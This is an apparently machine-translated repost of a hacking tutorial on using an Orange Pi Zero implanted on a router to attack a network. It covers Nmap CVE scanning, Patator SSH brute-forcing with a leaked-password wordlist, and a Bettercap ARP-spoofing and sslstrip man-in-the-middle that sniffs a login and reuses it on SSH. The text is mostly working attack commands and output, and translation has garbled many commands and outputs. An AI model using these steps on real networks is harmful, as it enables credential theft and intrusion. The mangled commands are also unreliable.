قالب وردپرس درنا توس
Home / Tips and Tricks / How to Perform Network-Based Attacks with an SBC Implant «Null Byte :: WonderHowTo

How to Perform Network-Based Attacks with an SBC Implant «Null Byte :: WonderHowTo



With a tiny computer, hackers can see every website you visit, use services on the network, and invade the gateway of your wireless router to edit sensitive settings. These attacks can be performed from any location where the attacker's computer was connected to the router via a networked implant.

The Orange Pi Zero and Armbian operating systems must first be set up for remote access and network-based attacks before you can continue. The operating system is not ready for use immediately. Be sure to read my previous setup article. This type of attack can also be done with a Raspberry Pi. However, the following installation commands were only tested with the Orange Pi Zero.

tokyoneon / null byte [19659005] This article focuses on performing multiple network-based attacks after Orange Pi Zero has been installed on the target router. The tools and attacks presented here are by no means exhaustive of how much damage an attacker can do to a network. However, it is a good place to start to show just how dangerous a network implant can be in the wrong hands.

Recommended at Amazon: Orange Pi Zero 512MB + white case

1. Performing Network Discovery and CVE Discovery with Nmap

Nmap is one of the most important network mapping tools. We can start by installing it on the Orange Pi Zero with the following commands apt-get .

  root @ orangepizero: ~ # apt-get update && apt-get install nmap 

Then install some useful NSE scripts, such as nmap-vulners and vulscan, as in my previous article on recognizing CVEs with Nmap scripts shown. When these tools are loaded onto the Orange Pi Zero, we can first identify the IP address, netmask, and route that the destination router gave the Orange Pi Zero.

  root @ orangepizero: ~ # ip addr

3: eth0:  mtu 1500 qdisc mq state UP group default qlen 1000
link / ether XX: XX: XX: XX: XX: XX brd ff: ff: ff: ff: ff: ff
inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0
valid_lft 86056sec preferred_lft 86056sec
inet6 xxxx :: xxxx: xxxx: xxxx: xxxx / 64 scope link
valid_lft forever preferred_lft forever 

We can see the address 192.168.8.138/24 and assume that the router is located at 192.168.8.1, which checks with the command ip route can be. Then ping the entire network ( -sn ) to discover available hosts.

  root @ orangepizero: ~ # nmap -sn 192.168.8.1/24

Start Nmap 7.40 (https://nmap.org) at 2019-04-15 01:17 UTC
Nmap Scan report for 192.168.8.1
The host is active (0.00038s latency).
MAC address: XX: XX: XX: XX: XX: XX (Mediabridge products)
Nmap Scan report for 192.168.8.2
Host is active (0.00049s latency).
MAC address: XX: XX: XX: XX: XX: XX (Mediabridge products)
Nmap Scan report for 192.168.8.179
Host is active (-0,088s latency).
MAC address: XX: XX: XX: XX: XX: XX (Sony)
Nmap Scan report for 192.168.8.183
Host is active (-0.10s latency).
MAC address: XX: XX: XX: XX: XX: XX (unknown)
Nmap Scan report for 192.168.8.138
Host is up.
Nmap finished: 256 IP addresses (5 hosts) scanned in 4.45 seconds 

For example, if we find the Sony device 192.168.8.183 interesting, we can continue to investigate this host.

  root @ orangepizero: ~ # nmap -sv -T4 --script nmap-vulners -F -A 192.168.8.183

Start Nmap 7.40 (https://nmap.org) at 2019-04-15 01:19 UTC
Nmap Scan report for 192.168.8.183
The host is active (0.00080s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
22 / tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; Protocol 2.0)
| vulners:
| cpe: / a: openbsd: openssh: 7.6p1:
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| _ CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
MAC Address: 48: 1C: 52: 9F: A6: 71 (Unknown)
Device type: general purpose
Running: Linux 3.X | 4.X
Operating system CPE: cpe: / o: linux: linux_kernel: 3 cpe: / o: linux: linux_kernel: 4
Operating system details: Linux 3.2 - 4.6
Network Removal: 1 hop
Serviceinfo: Operating System: Linux; CPE: cpe: / o: linux: linux_kernel 

We can see that the NSE script from nmap-vulners has discovered two CVEs with this particular SSH server. The host is almost certainly an Ubuntu machine, so automatic updates have probably done a good job of fixing serious security vulnerabilities.

We could continue to explore the service or other hosts on the network with advanced Nmap scans and scripts. For more information about Nmap, see the following articles.

. 2 Patator Brute-Force Attacks

Like Hydra and Medusa, Patator is a highly-flexible, fully-featured command-line brute-force tool. It quickly became one of my favorite hacking tools. In my previous article Patator was used to perform a dictionary attack on various router gateways, which is very suitable for a network-based attack like this Orange Pi Zero hack. This time, however, I will be showing Patator's SSH Brute-Forcing module.

First, install the required dependencies that are required for the Patator Python script. Since there are some packages, this process can take up to ten minutes. Advancing the command screen (screen should be installed) is recommended. In the event that the SSH connection is lost, Screen will keep the installation running and access it when the connection is reestablished.

  root @ orangepizero: ~ # screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap -utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python -pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake

Read package lists ... Done
Create dependency tree
Status information is read ... Done
The following NEW packages will be installed:
adwaita-icon-theme ca-certificate-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan
java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi -gemeinsam3
libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1
libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjp -Turbo
libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5 dev
librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0
libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0
libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandce2
libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11
0 updated, 131 reinstalled, 0 removed and 0 not updated.
Need to get 112 MB of archives.
After this process, 312 MB of additional space will be used.
Would you like to continue? [Y/n] 

Update the packages setuptools and wheel with the following command pip :

  root @ orangepizero: ~ # pip install - upgrade setuptools wheel

Collect setup tools
Download from https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575khl)
100% | ████████████████████████████████ | 583 kB 181 kB / s
Install collected packages: setuptools
Found existing installation: setuptools 33.1.1
Do not uninstall setup tools under /usr/lib/python2.7/dist-packages, outside environment / usr
Setuptools-41.0.0 Installed Successfully 

Clone the Patator GitHub repository with the command git .

  root @ orangepizero: ~ # git clone https://github.com/lanjelot/patator//opt/patator

Cloning in & # 39; / opt / patator & # 39; ...
remote: list objects: 457, done.
Remote: Total 457 (Delta 0), reused 0 (Delta 0), pack reused 457
Receive objects: 100% (457/457), 325.11 KiB | 149.00 KiB / s, done.
Resolve deltas: 100% (157/157), done. 

Change ( cd ) to the new directory / opt / patator /.

  root @ orangepizero: ~ # cd / opt / patator / 

Then use pip again to install additional requirements. This process can take up to 20 minutes. The packages pynacl and cryptography seemed to take a particularly long time in my tests.

  root @ orangepizero: / opt / patator # pip install -r requirements.txt

Download from https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB)
100% | ████████████████████████████████ | 194 kB 216 kB / s
Collect Pycurl (from -r requirements.txt (line 2))
Download from https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB)
100% | ████████████████████████████████ | 215 kB 172 kB / s
Collect Ajpy (from -r requirements.txt (line 3))
Download from https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz
Collect Pyopenssl (from -r requirements.txt (line 5))
Download from https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB)
100% | ████████████████████████████████ | 61 kB 66 kB / s
Collect Cx_Oracle (from -r requirements.txt (line 6))
Download from https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB)
100% | ████████████████████████████████ | 296 kB 177 kB / s
Collect mysqlclient (from -r requirements.txt (line 7))
Download from https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB)
100% | ████████████████████████████████ | 92 kB 98 kB / s
Collect psycopg2-binary (from -r requirements.txt (line 8))
Download from https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB)
100% | ████████████████████████████████ | 378 kB 169 kB / s
Collect Pycrypto (from -r requirements.txt (line 9))
Download from https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB)
100% | ████████████████████████████████ | 450 kB 114 kB / s

...

Filed in: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e
Runs setup.py bdist_wheel for bcrypt ...
Saved in the directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3
Run Setup.py bdist_wheel for pycryptodomex ... done
Filed in: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0
Runs setup.py bdist_wheel for cffi ... done
Filed in: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2
Pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi
Install Packages Collected: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopensl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, pysphy pysnmp
Successfully Installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0 .22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl -19.0.0 pysmi-0.3.3 pysnmp-4.4.9 

When this is done, check if Patator is working and display the available modules with option – help .

  root @ orangepizero: / opt / patator # ./patator.py --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
+ ftp_login: brute force FTP
+ ssh_login: Brute Force SSH
+ telnet_login: brute force telnet
+ smtp_login: brute force SMTP
+ smtp_vrfy: List valid users with SMTP VRFY
+ smtp_rcpt: List valid users with SMTP RCPT TO
+ finger_lookup: Lists valid users with finger
+ http_fuzz: Brute Force HTTP
+ rdp_gateway: brute-force RDP gateway
+ ajp_fuzz: brute force AJP
+ pop_login: brute force POP3
+ pop_passd: Brute Force Poppassd (http://netwinsite.com/poppassd/)
+ imap_login: brute force IMAP4
+ ldap_login: brute-force LDAP
+ smb_login: brute force SMB
+ smb_lookupsid: brute-force SMB SID lookup
+ rlogin_login: brute force rlogin
+ vmauthd_login: brute-force VMware authentication daemon
+ mssql_login: brute-force MSSQL
+ oracle_login: Brute-force Oracle
+ mysql_login: brute-force MySQL
+ mysql_query: brute-force MySQL queries
+ rdp_login: Brute Force RDP (NLA)
+ pgsql_login: brute force PostgreSQL
+ vnc_login: brute-force VNC
+ dns_forward: forward DNS search
+ dns_reverse: Reverse DNS lookup
+ snmp_login: brute-force SNMP v1 / 2/3
+ ike_enum: Listing IKE transformations
+ unzip_pass: brute force password for encrypted ZIP files
+ keystore_pass: brute force password for Java keystore files
+ sqlcipher_pass: brute force password for SQLCipher encrypted databases
+ umbraco_crack: Umbraco crack HMAC-SHA1 password hashes
+ tcp_fuzz: Fuzz TCP services
+ dummy_test: Test Module 

The same SSH service previously discovered can now be brutally enforced with Patator's ssh_login module. Use the following command to display the available ssh_login options.

  root @ orangepizero: / opt / patator # ./patator.py ssh_login

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: ssh_login  [global-options ...]

  Examples:
ssh_login host = 10.0.0.1 user = root password = FILE0 0 = passwords.txt -x ignore: mesg = & # 39; Authentication failed. & # 39;

Module options:
host: destination host
Harbor: destination port [22]
user: username to test
Password: Passwords for testing
auth_type: Type of password authentication to use [password|keyboard-interactive|auto]
Keyfile: file to test with private RSA, DSA, or ECDSA key
persistent: use persistent connections [1|0] 

For a more complete, more comprehensive list of options and arguments, use the options ssh_login and – help together.

  root @ orangepizero: / opt / patator # ./patator.py ssh_login --help 

For demo purposes, I use a word list created from leaked password databases. This can be quickly downloaded to the Orange Pi Zero with the following command wget .

  root @ orangepizero: / opt / patator # wget # https: //git.io/fhhvc' -O / tmp /simple_wordlist.txt

--2019-04-15 02: 19: 09-- https://git.io/fhhvc
Git.io is dissolved (git.io) ... 52.203.53.176
Connect to git.io (git.io) | 52.203.53.176 |: 443 ... connected.
HTTP request sent, answer expected ... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-04-15 02: 19: 13-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Raw.githubusercontent.com is resolved (raw.githubusercontent.com) ... 199.232.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com) | 199.232.8.133 |: 443 ... connected.
HTTP request sent, response expected ... 200 OK
Length: 25585 (25K) [text/plain]
Save as: "/tmp/simple_wordlist.txt"

/tmp/simple_wordlist.txt 100% [==============================>] 24.99K 59.7KB / s in 0.4s

2019-04-15 02:19:22 (59.7 KB / s) - & # 39; /tmp/simple_wordlist.txt' [25585/25585] 

Brute Force operation for the SSH service with the following Patator command.

  root @orangepizero: /opt/patator # ./patator.py ssh_login host = 192.168.8.183 port = 22 user = root password = FILE0 0 = / tmp / simple_wordlist.txt -t 1

INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC
INFO -
INFO - Code Size Time | Candidate num | mesg
INFO - ------------------------------------------------ -----------------------------
INFO - 1 22 2.005 | 123456 | 1 | Authentification failed.
INFO - 1 22 2.277 | Abcdef123 | 2 | Authentification failed.
INFO - 1 22 1.344 | a123456 | 3 | Authentification failed.
INFO - 1 22 1.814 | little123 | 4 | Authentification failed.
INFO - 1 22 2.081 | nanda334 | 5 | Authentification failed.
INFO - 1 22 2.023 | N97nokia | 6 | Authentification failed.
INFO - 1 22 1.676 | Password | 7 | Authentification failed.
INFO - 1 22 2.249 | Pawerjon123 | 8 | Authentification failed.
INFO - 1 22 2.180 | 421uiopy258 | 9 | Authentification failed.
INFO - 1 22 2.116 | MYworklist123 | 10 | Authentification failed.
INFO - 1 22 1.879 | 12345678 | 11 | Authentification failed.
INFO - 1 22 2.015 | QWERTY | 12 | Authentification failed.
INFO - 1 22 1.772 | nks230kjs82 | 13 | Authentification failed.
INFO - 1 22 2.212 | trustno1 | 14 | Authentification failed.
INFO - 1 22 1.631 | zxcvbnm | 15 | Authentification failed.
INFO - 1 22 2.116 | N97nokiamini | 16 | Authentification failed.
INFO - 1 22 2.050 | letmein | 17 | Authentification failed.
INFO - 1 22 1.814 | 123456789 | 18 | Authentification failed.
INFO - 1 22 2.107 | myplex | 19 | Authentification failed.
INFO - 1 22 0,042 | tokyoneon | 20 | Authentification failed.
INFO - 1 22 2.375 | gm718422 @ | 21 | Authentification failed.
INFO - 1 22 1.613 | churu123A | 22 | Authentification failed.
INFO - 1 22 1.914 | abc123 | 23 | Authentification failed.
INFO - 1 22 1.820 | plex123 | 24 | Authentification failed.
INFO - 1 22 1,778 | any123456 | 25 | Authentification failed.
INFO - 1 22 2.048 | Lwf1681688 | 26 | Authentification failed.

INFO - Hit / Done / Skip / Failed / Size: 26/26/0/0/26, average: 0 U / s, time: 0h 0m 51s] on the given  post =  with the word list (  0 ). To avoid overburdening the SSH service with too many password attempts per second, use  -t  to specify the number of concurrent threads. This value is set to ten by default, but can be increased or decreased as needed. 

. 3 Performing Man-in-the-Middle Attacks with Bettercap

Before installing Bettercap, the programming language Go (Golang) must first be installed. Bettercap relies on the later version of Golang, which is not available in the Debian repositories. To get the latest version of Golang, first download the dependencies.

  root @ orangepizero: ~ # apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev

Read package lists ... Done
Create dependency tree
Status information is read ... Done
build-essential is already the latest version (12.3).
Golang is already the newest version (2: 1.7 ~ 5).
The following additional packages will be installed:
libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config
Recommended packages:
libusb-1.0-doc
The following NEW packages will be installed:
libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config
0 updated, 7 reinstalled, 0 removed and 0 not updated.
Requires 405 kB archives.
After this process, 1,142 KB of additional memory is used.
Would you like to continue? [Y/n] 

If you are not already logged in as root, go to the / root / directory for the following commands. Using the / tmp directory is not recommended because the Orange Pi Zero may not have enough memory during certain processes.

  root @ orangepizero: ~ # cd / root / 

Then download the tar.gz file with the Golang source code.

  root @ orangepizero: ~ # wget # https: //dl.google.com/go/go1.12.7.linux-armv6l.tar.gz'

--2019-04-13 19: 52: 48 - https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz
Resolve dl.google.com (dl.google.com) ... 172,217,194.93, 172,217,194,136, 172,217,194,190, ...
Connect to dl.google.com (dl.google.com) | 172.217.194.93 |: 443 ... connected.
HTTP request sent, response expected ... 200 OK
Length: 106218905 (101M) [application/octet-stream]
Save as: "go1.12.7.linux-armv6l.tar.gz"

go1.12.7.linux-armv6l.tar.gz 100% [==============================>] 101.30M 3.28MB / s in 34s

2019-04-13 19:53:22 (3.02 MB / s) - & # 39; go1.12.7.linux-armv6l.tar.gz & # 39; saved [106218905/106218905] 

Next unzip the compressed tar.gz file.

  root @ orangepizero: ~ # tar -C / usr / local -xzf go1. *. tar.gz 

The $ PATH must be defined to execute the following commands.

  root @ orangepizero: ~ # export PATH = $ PATH: / usr / local / go / bin 

Before cloning the Bettercap repository, the available "swap space" on the Orange Pi Zero must be expanded. Swap is defined as part of the hard disk that the operating system assigned as temporary memory. When the operating system consumes all the available hardware RAM (512 MB for the Orange Pi Zero), it uses the swap.

To create a new swap space, use the following command dd to create a 2 GB file ( 2048 ) with / dev / zero null data. This command should take about three minutes.

  root @ orangepizero: ~ # dd if = / dev / zero of = / root / swapfile bs = 1M count = 2048

2048 + 0 records in
2048 + 0 records off
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB / s 

Then use the command mkswap . Ignore the warning "Unsafe permissions". On a non-hacking system, this command would be executed differently. However, this is not essential for this particular scenario.

  root @ orangepizero: ~ # mkswap / root / swapfile

mkswap: / root / swapfile: unsafe permissions 0644, 0600 suggested.
Set up Swapspace version 1, size = 2 GiB (2147479552 bytes)
no label, UUID = e629a001-7a20-4346-8479-4a04fae459af 

Enable the new swap space with the swapon command.

  root @ orangepizero: ~ # swapon / root / swapfile

swapon: / root / swapfile: unsafe permissions 0644, 0600 suggested. 

The new swap space can be checked with the command free to display the available memory.

  root @ orangepizero: ~ # free - ht

Total free shared buff / cache used available
Mem: 493 M 84 M 9.0 M 604 K 399 M 397 M
Swap: 2.2G 19M 2.2G
Total: 2.7G, 104M, 2.2G 

Note that the swap: is over 2GB. Now return to the Bettercap installation process. Clone the Bettercap GitHub repository with the following command go :

  root @ orangepizero: ~ # go get github.com/bettercap/bettercap[19659010<Definethe$GOPATHwithexport  command. 

  root @ orangepizero: ~ # export GOPATH = / root / go / 

Change to the newly created Bettercap directory.

  root @ orangepizero: ~ # cd $ GOPATH / src / github. com / bettercap / bettercap 

Run the command make build . There is no issue.

  root @ orangepizero: ~ / go / src / github.com / bettercap / bettercap # make build 

Finally, install Bettercap with the command make install .

  root @ orangepizero: ~ / go / src / github.com / bettercap / bettercap # make install 

To start Bettercap, use the following command with option -iface to get the target ( Router). Interface. Otherwise, Bettercap may attack devices that are authenticated to the Orange Pi Zero Wi-Fi hotspot, if it has been previously set up.

The screen is also recommended here. Bettercap will run permanently if you temporarily disconnect from the Orange Pi Zero and re-connect at a later time.

  root @ orangepizero: ~ / go / src / github.com / bettercap / bettercap # screen bettercap -iface eth0

bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands]

192.168.8.0/24> 192.168.8.138 »

To get started, you can use the command help to display available options and execute modules.

  10th #. #. # / 24> 10. #. #. ## "Help

help MODULE: Lists the available commands or displays the module-specific help if no module name is specified.
active: Display information about active modules.
Exit: Close the session and exit.
sleep SECONDS: Sleep for the specified number of seconds.
get NAME: Returns the value of the variable NAME, uses * alone for all or NAME * as wildcard.
set NAME VALUE: Sets the VALUE of the variable NAME.
Read VARIABLE PROMPT: Display a PROMPT to ask the user for input stored in VARIABLE.
clear: clears the screen.
include CAPLET: Download this caplet and run it in the current session.
! COMMAND: Run a shell command and print the output.
Alias ​​MAC NAME: Alias ​​an endpoint with its MAC address.

modules

any.proxy> is not working
api.rest> does not work
arp.spoof> is not working
ble.recon> is not working
Caplets> do not work
dhcp6.spoof> is not working
dns.spoof> is not working
events.stream> running
GPS> does not work
hidden> not executed
http.proxy> is not working
http.server> does not work
https.proxy> is not working
https.server> does not work
mac.changer> is not working
mysql.server> does not work
net.probe> is not working
net.recon> is not working
net.sniff> is not working
packet.proxy> is not running
syn.scan> does not work
tcp.proxy> is not working
ticker> does not work
ui> does not work
update> does not work
wifi> does not work
wol> does not work

192.168.8.0/24> 192.168.8.138 »

Then retrieve the latest caplets from the Bettercap repository with the command caplets.update . Caplets are used to automate Bettercap commands and options.

  10th #. #. # / 24> 10. #. #. ## »caplets.update

[21:18:57] [sys.log] [inf]   Caplets Download Caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[21:19:03] [sys.log] [inf]   Caplets that install caplets in / usr / local / share / bettercap / caplets ... 

Use caplets.show to display the installed caplets and their location on the operating system. We recommend checking the caplet files for short descriptions of each function.

  10th #, #. # / 24> 10. #. #. ## »caplets.show

┌─────────────────────────────────────┬─────────── ────────────────────────────────────────────────── ───────────────┬────────┐
│ Name │ Path │ Size │
├─────────────────────────────────────┼─────────── ────────────────────────────────────────────────── ───────────────┼────────┤
│ ap │ /usr/local/share/bettercap/caplets/ap.cap │ 307 B │
│ Crypto-Miner / Crypto-Miner │ /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap │ 666 B │
│ download-autopwn / download-autopwn │ /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap │ 2,6 kB │
│ fb-phish / fb-phish │ /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap │ 140 B │
│ gitspoof / gitspoof │ /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap │ 216 B │
│ gps │ /usr/local/share/bettercap/caplets/gps.cap │ 109 B │
│ hstshijack / hstshijack │ /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap │ 799 B │
│ http-req-dump / http-req-dump │ /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap │ 591 B │
│ http-ui │ /usr/local/share/bettercap/caplets/http-ui.cap │ 382 B │
│ https-ui /usr/local/share/bettercap/caplets/https-ui.cap │ 661 B │
│ jsinject / jsinject │ /usr/local/share/bettercap/caplets/jsinject/jsinject.cap │ 210 B │
│ local-sniffer │ /usr/local/share/bettercap/caplets/local-sniffer.cap │ 244 B │
│ login-manager-abuse/login-man-abuse │ /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B  │
│ mana                                │ /usr/local/share/bettercap/caplets/mana.cap                                │ 61 B   │
│ massdeauth                          │ /usr/local/share/bettercap/caplets/massdeauth.cap                          │ 302 B  │
│ mitm6                               │ /usr/local/share/bettercap/caplets/mitm6.cap                               │ 551 B  │
│ netmon                              │ /usr/local/share/bettercap/caplets/netmon.cap                              │ 42 B   │
│ pita                                │ /usr/local/share/bettercap/caplets/pita.cap                                │ 900 B  │
│ proxy-script-test/proxy-script-test │ /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B   │
│ rogue-mysql-server                  │ /usr/local/share/bettercap/caplets/rogue-mysql-server.cap                  │ 501 B  │
│ rtfm/rtfm                           │ /usr/local/share/bettercap/caplets/rtfm/rtfm.cap                           │ 210 B  │
│ simple-passwords-sniffer            │ /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap            │ 131 B  │
│ tcp-req-dump/tcp-req-dump           │ /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap           │ 413 B  │
│ web-override/web-override           │ /usr/local/share/bettercap/caplets/web-override/web-override.cap           │ 254 B  │
└─────────────────────────────────────┴────────────────────────────────────────────────────────────────────────────┴────────┘

To quickly enumerate active hosts on the network, invoke the netmon caplet with the include command.

10.#.#.#/24 > 10.#.#.##  »  include netmon

┌───────────────┬───────────────────┬─────────────┬────────────────────────────┬───────┬────────┬──────────┐
│     IP ▴      │        MAC        │    Name     │           Vendor           │ Sent  │ Recvd  │   Seen   │
├───────────────┼───────────────────┼─────────────┼────────────────────────────┼───────┼────────┼──────────┤
│ 192.168.8.138 │ XX:XX:XX:XX:XX:XX │ eth0        │                            │ 0 B   │ 0 B    │ 21:18:37 │
│ 192.168.8.1   │ XX:XX:XX:XX:XX:XX │ gateway     │ Mediabridge Products, LLC. │ 19 kB │ 8.6 kB │ 21:18:37 │
│               │                   │             │                            │       │        │          │
│ 192.168.8.179 │ XX:XX:XX:XX:XX:XX │             │ Sony Corporation           │ 32 kB │ 128 kB │ 21:20:24 │
│ 192.168.8.193 │ XX:XX:XX:XX:XX:XX │ Windows 10  │                            │ 916 B │ 1.3 kB │ 21:20:20 │
└───────────────┴───────────────────┴─────────────┴────────────────────────────┴───────┴────────┴──────────┘

↑ 54 kB / ↓ 433 kB / 4310 pkts

Alternatively, traffic transmitting between devices on the network can be sniffed by running the following six commands in order.

10.#.#.#/24 > 10.#.#.##  »  set http.proxy.sslstrip true
10.#.#.#/24 > 10.#.#.##  »  set arp.spoof.internal true
10.#.#.#/24 > 10.#.#.##  »  set net.sniff.verbose false
10.#.#.#/24 > 10.#.#.##  »  net.sniff on
10.#.#.#/24 > 10.#.#.##  »  http.proxy on
10.#.#.#/24 > 10.#.#.##  »  arp.spoof on

Bettercap will begin to display a ton of data transmitting over the network. In some cases, there may be servers and services running on the network that don&#39;t support HTTPS or use it by default. These are prime targets for tools like Bettercap.

Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices.

POST /media_server/Users/authenticatebyname HTTP/1.1
Host: 192.168.8.183:8096
Accept-Encoding: gzip, deflate
X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"
Content-Length: 46
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Referer: http://192.168.8.183:8096/web/index.html
Content-Type: application/json
Origin: http://192.168.8.183:8096
Accept: application/json
Accept-Language: en-US,en;q=0.5

{
  "Username": "tokyoneon",
  "Pw": "secure_password-321"
}

Bettercap displays the username and password data found in the login request. These credentials can be used to pivot to other devices on the network, for example, the previously discovered SSH server on 192.168.8.183. Now that the attacker has some sense of the target&#39;s preferred username and password scheme, they can test the credentials against other services on the network.

root@orangepizero:~# cd /opt/patator/
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password=&#39;secure_password-321&#39; -t 1

INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 0     39     0.117 | | 1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s

The Patator request didn&#39;t return an "Authentication failed" message this time. This is a pretty good indication the password is correct. The same username and password can be used to log into the SSH server for a password reuse attack.

root@orangepizero:/opt/patator# cd
